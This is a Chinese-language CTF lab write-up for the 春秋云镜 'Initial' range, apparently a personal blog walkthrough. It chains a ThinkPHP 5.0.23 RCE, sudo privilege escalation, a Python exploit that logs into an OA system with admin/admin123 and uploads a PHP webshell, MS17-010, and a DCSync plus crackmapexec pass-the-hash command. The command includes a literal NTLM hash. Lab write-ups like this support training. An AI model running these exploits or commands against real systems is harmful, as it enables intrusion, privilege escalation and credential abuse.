我顶!
春秋云镜-Initial
外网
开始的时候给了一个ip 直接扫描端口
80端口 上去看看
注意到是title 明显是thinkphp
工具跑一下 发现存在ThinkPHP 5.0.23 RCE
一键getshell之后 蚁剑连接
上传linux-exploit-suggester 到tmp目录下 提权
可以看到sudo 提权
sudo -l 查看
mysql存在sudo权限
注意的是蚁剑的shell是模拟出来的shell 不能直接使用/bin/sh 提权
得到flag1
查看内网ip
上传 fscan 扫描内网
搭建代理 传递流量出来
172.22.1.18
弱密码admin/admin123 登录
网上翻找有没有payload
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34
| import requests
session = requests.session()
url_pre = 'http://172.22.1.18/' url1 = url_pre + '?a=check&m=login&d=&ajaxbool=true&rnd=533953' url2 = url_pre + '/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913' url3 = url_pre + '/task.php?m=qcloudCos|runt&a=run&fileid=11'
data1 = { 'rempass': '0', 'jmpass': 'false', 'device': '1625884034525', 'ltype': '0', 'adminuser': 'YWRtaW4=', 'adminpass': 'YWRtaW4xMjM=', 'yanzm': '' }
r = session.post(url1, data=data1) r = session.post(url2, files={'file': open("D:\\Desktop\\1.php", 'r+')})
filepath = str(r.json()['filepath']) filepath = "/" + filepath.split('.uptemp')[0] + '.php' id = r.json()['id']
url3 = url_pre + f'/task.php?m=qcloudCos|runt&a=run&fileid={id}'
r = session.get(url3) r = session.get(url_pre + filepath + "?1=system('dir');") print(r.text)
|
一句话木马连接 得到第二段flag
172.22.1.21
扫出来存在MS17-010 永恒之蓝漏洞 msfpayload直接打就行
shell 进入交互shell 查看 没存在flag
172.22.1.2(DC)
DCsync导出域内用户hash
1
| proxychains crackmapexec smb 172.22.1.2 -u administrator -H10cf89a850fb1cdbe6bb432b859164c8 -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt"
|
得到flag3